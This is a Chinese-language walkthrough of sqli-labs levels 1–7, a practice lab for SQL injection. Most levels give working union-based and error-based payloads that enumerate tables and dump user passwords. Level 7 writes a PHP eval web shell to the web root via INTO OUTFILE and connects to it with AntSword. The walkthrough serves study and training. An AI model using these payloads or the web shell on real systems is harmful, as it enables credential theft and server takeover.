没了解sql注入的知识,本篇更像是复现
数据库层面
│ ├── 数据库1(Database 1)
│ │ ├── 表1(Table 1)
│ │ │ ├── 主键字段(Primary Key):唯一标识表中的每一行。
│ │ │ ├── 字段2(Field 2):存储不同类型的数据,如字符串、数字、日期等。
│ │ │ │ ├── 数据类型(Data Type):定义字段可以存储的数据类型。
│ │ │ │ └── 约束条件(Constraints):限制字段的值,如唯一、非空、检查等。
│ │ │ └── 数据记录(Data Records):表中的具体数据,由行和列组成。
│ │ ├── 表2(Table 2)
│ │ │ ├── 字段结构(Field Structure):定义表的结构和字段属性。
│ │ │ └── 外键(Foreign Key):建立表与表之间的关系,确保数据的完整性。
│ │ └── 视图(View)
│ │ ├── 虚拟表(Virtual Table):基于一个或多个基础表的查询结果。
│ │ └── 视图定义(View Definition):定义视图的查询语句和权限。
│ ├── 数据库2(Database 2)
│ │ ├── 存储过程(Stored Procedures):预编译的SQL语句,可重复使用。
│ │ ├── 函数(Functions):执行特定任务并返回结果。
│ │ └── 触发器(Triggers):在特定事件发生时自动执行的操作。
│ └── 系统数据库(System Database)
│ ├── 信息存储(Information Storage):存储数据库元数据和系统配置。
│ ├── 系统表(System Tables):定义数据库的结构和状态。
│ └── 日志表(Log Tables):记录数据库的操作和错误信息。
数据库结构大致是库~表~字段
mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,这个数据库下有两个表tables和columns,tables有table_name和table_schema两个字段,其中table_name字段下面是所有数据库存在的表名 '所有数据库------>表名',table_schema字段下是所有表名对应的数据库名'所有表名------>数据库名';columns有colum_name和columns_schema两个字段,其中colum_name字段下是所有数据库存在的字段名所有数据库------>字段名,columns_schema字段下是所有表名对应的数据库'所有表名------>数据库'
如何判断是字符型注入还是数字型注入_怎么判断是字符型注入还是数字型注入-CSDN博客
1
data:image/s3,"s3://crabby-images/35073/35073d417bd9acd0bdfd99b71d34e0746e39ffbf" alt=""
提示输入id,上传id=1
data:image/s3,"s3://crabby-images/6c054/6c054fc7a41591213a875b13cda727c167b2c2d9" alt=""
判断sql语句是否是拼接,且是字符型还是数字型
data:image/s3,"s3://crabby-images/f3dc3/f3dc3a1f2767b7cbbe68ebe0d36cc9ec6497bb5b" alt=""
data:image/s3,"s3://crabby-images/dac7c/dac7c22f799d913b3ef642b9acffa9a4d46f8568" alt=""
可以看到加'的时候报错了,所以sql语句要是字符型的,使用联合查询,联合查询就是两个sql语句一起查询,两张表具有相同的列数,且字段名是一样的。
判断是否存在sql注入,先尝试闭合看看是否报错,使用id=1' order by 3--+查列名
data:image/s3,"s3://crabby-images/e9e8f/e9e8f8cf8b2e329ef88e618d3b31132eab8492a2" alt=""
继续查第四列发现报错了
data:image/s3,"s3://crabby-images/a0ad8/a0ad8aea1dc3ae8e8795f30e7323595eb4ea4582" alt=""
说明只有3列,也可以用id=1' union select 1,2,3,4 --+去查列表,这样可以一键查出来有多少列。
接着查账号密码属于多少列,使用?id=-1' union select 1,2,3 --+
data:image/s3,"s3://crabby-images/6f3e6/6f3e6d65dc07249fed9fe27dcf0524338ddb91f0" alt=""
可以看到name在2列,密码在3列,接着使用?id=-1'union select1,database(),version()--+看数据名和版本名
data:image/s3,"s3://crabby-images/2147b/2147b194aa525e7d706c44b182bf07d523d62f66" alt=""
得到名称是security,利用information_schema.tables数据库查询库中所以的表和列
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容
data:image/s3,"s3://crabby-images/d6b7d/d6b7df216c1169f95b1df60c60d7f8849dcbd0b3" alt=""
通过查询,我们得到了四个表名,猜测信息可能在user里面,接下来爆字段名
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name
data:image/s3,"s3://crabby-images/82533/82533e838c407a3ac827e5b2827c6b084a81cb61" alt=""
得到了两个字段,从名称上看应该是账号密码
?id=-1' union select 1,2,group_concat(username ,id , password) from users--+
加上id隔开账号密码,查询这两个字段的内容
data:image/s3,"s3://crabby-images/5a2fa/5a2fad744539957bd9b3fed968b7a3bc44d55a41" alt=""
2
先判断类型?id=1'
data:image/s3,"s3://crabby-images/4a232/4a232d25c830c7a56b8d9f8ab6f82d806962160f" alt=""
data:image/s3,"s3://crabby-images/9d370/9d37092c584e08ef1c3788c3cf269d8b16b9b162" alt=""
显然是数字型,不存在联合拼接查列表?id=1 union select 1,2,3,4 --+
data:image/s3,"s3://crabby-images/dbfb9/dbfb9aa0bd3eaa7f13b3792138641c6316ba3d4c" alt=""
查属于多少列?id=-1 union select 1,2,3 --+
data:image/s3,"s3://crabby-images/eee29/eee290d94a382b2d3dffa7800d005f61170f55ca" alt=""
name在2,passwd在3,查数据名和版本?id=-1 union select 1,database(),version()
data:image/s3,"s3://crabby-images/b0bf4/b0bf4b2a42b6fd1b132be85c15e4548eac60e7e1" alt=""
数据名叫security,暴库?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
data:image/s3,"s3://crabby-images/06acf/06acf1adc1368cc866552618407527e6058c4a5b" alt=""
还是在user,爆字段名?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
data:image/s3,"s3://crabby-images/6ae88/6ae88be8995f27bf6ca541acced99bcdb7c7b7d7" alt=""
和上一关一样,查询username和password
?id=-1 union select 1,2,group_concat(username ,id , password) from users
data:image/s3,"s3://crabby-images/27c6b/27c6b4289a9b1b70ecfb4a7727ced00dfe4eb77d" alt=""
3
?id=1 and 1=1
data:image/s3,"s3://crabby-images/463b9/463b931ba775e8906cdeaee8514dca641a1068ab" alt=""
?id=1 and 1=2
data:image/s3,"s3://crabby-images/d6efc/d6efc9b1f5914cb643e30be940618f7c66865dda" alt=""
?id=1' and '1'='1
data:image/s3,"s3://crabby-images/dc491/dc491bbb25668868ee933b816544d7c688d537cc" alt=""
是字符型注入
wp中使用?id=2')--+
data:image/s3,"s3://crabby-images/0627c/0627c70fd40ac0d0774f0cbc586917d3c0100bee" alt=""
?id=2'
data:image/s3,"s3://crabby-images/0c4bb/0c4bb190e6bba61f54869126bc1ca5d245d7eda2" alt=""
报错,说明sql语句是引号字符型且有括号
查列表?id=1')union select 1,2,3--+
data:image/s3,"s3://crabby-images/9e2e0/9e2e0684d14c6f4099b5bc66e7cabcac61a82c1b" alt=""
有三个列表,查库名和版本名?id=-1') union select 1,database(),version()--+
data:image/s3,"s3://crabby-images/07753/077535f8c90384384286779f53b56d42c8c679f6" alt=""
一样的名称,暴库?id=-1')union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
同样是在user
爆字段名?id=-1')union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
data:image/s3,"s3://crabby-images/803c7/803c7ae941e44297b374b581842f44b61f17bbf5" alt=""
查询账号密码?id=-1')union select 1,2,group_concat(username ,id , password) from users--+
4
?id=1") order by 3--+
data:image/s3,"s3://crabby-images/c8e23/c8e2349a5c9d0017096f59450eba059f03b171c0" alt=""
区别于上一关的,这关是双引号字符型,带括号
查列表?id=1")union select 1,2,3--+
data:image/s3,"s3://crabby-images/892f6/892f6da378debd8b01b91e4a96255fbbbe6c4b34" alt=""
查库名和版本名?id=-1") union select 1,database(),version()--+
data:image/s3,"s3://crabby-images/2fbfa/2fbfab7a88ffa266f513426ee71d6e0c33e5f6c0" alt=""
暴库?id=-1")union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
data:image/s3,"s3://crabby-images/4082f/4082f4abbab370edd291368d62685c3ef7feac60" alt=""
爆字段名?id=-1")union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
data:image/s3,"s3://crabby-images/657b3/657b3a1e62ef163e6a7c55bb7bdc1163851bdcca" alt=""
查询账号密码?id=-1")union select 1,2,group_concat(username ,id , password) from users--+
5
data:image/s3,"s3://crabby-images/1e413/1e413f6e563dcc159117eccedad9d027f4ac3179" alt=""
data:image/s3,"s3://crabby-images/308a1/308a1c9ef62b8095bdd1078f888d8a1ac443cd45" alt=""
data:image/s3,"s3://crabby-images/9e943/9e943e21d0b1f8cc20b7689e6addaa916e872ab0" alt=""
data:image/s3,"s3://crabby-images/e48a3/e48a39d37da24e7526333a534b580c2c6afbfbfd" alt=""
data:image/s3,"s3://crabby-images/b8e49/b8e49ce982e836afcab75a0ae89894e8755cc809" alt=""
单引号闭合型,且列表数为3
data:image/s3,"s3://crabby-images/eb2a2/eb2a279b2e87976199c3fe01b30cd0bf946c863f" alt=""
列表数为3,使用上面的办法显然是不行的,可以看到查询id的时候出来的不是账号密码,而是一串字符串,没有其他的显示,这时候用到布尔盲注,用到length(),ascii() ,substr()这三个函数
或者报错盲注,报错注入主要用extractvalue,updateml,floor函数
使用报错盲注
?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
data:image/s3,"s3://crabby-images/49ce2/49ce2c970c819d1523dbfa96d41a32d92e9d9a9d" alt=""
暴库?id=1' union select extractvalue(1,concat('~','~',database())) -- a
爆表?id=1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~')) -- a
爆数据?id=1' and extractvalue(1,concat('~',(select group_concat(username) from security.users),'~')) -- a
前后看了几个wp,发现不论我怎么注入返回的画面都是这个画面,但是步骤就是上面那个
6
id=1' order by 4 --+
data:image/s3,"s3://crabby-images/c4b13/c4b13796e08e0935df0256bbfea480d95422a043" alt=""
id=1" order by 4 --+
这题相较于上一题显然是双引号闭合型,其余都一样
7
多次尝试闭合类型,是'))闭合
data:image/s3,"s3://crabby-images/48c67/48c67fbece82f32eda67e460411e946bd904f07b" alt=""
提示输出文件,使用?id=1')) union select 1,'<?php @eval($_POST["456"]);?>',3 into outfile "E:\\phpstudy_pro\\www\\sqli-labs\\Less-7\\m456.php" -- a将木马写入
data:image/s3,"s3://crabby-images/21340/21340acb7f74d5965a14d6abb26a61e63a6469ed" alt=""
使用蚁剑连接
data:image/s3,"s3://crabby-images/2c89d/2c89dff77f01b5bffe782486dab7b34d0ba890f3" alt=""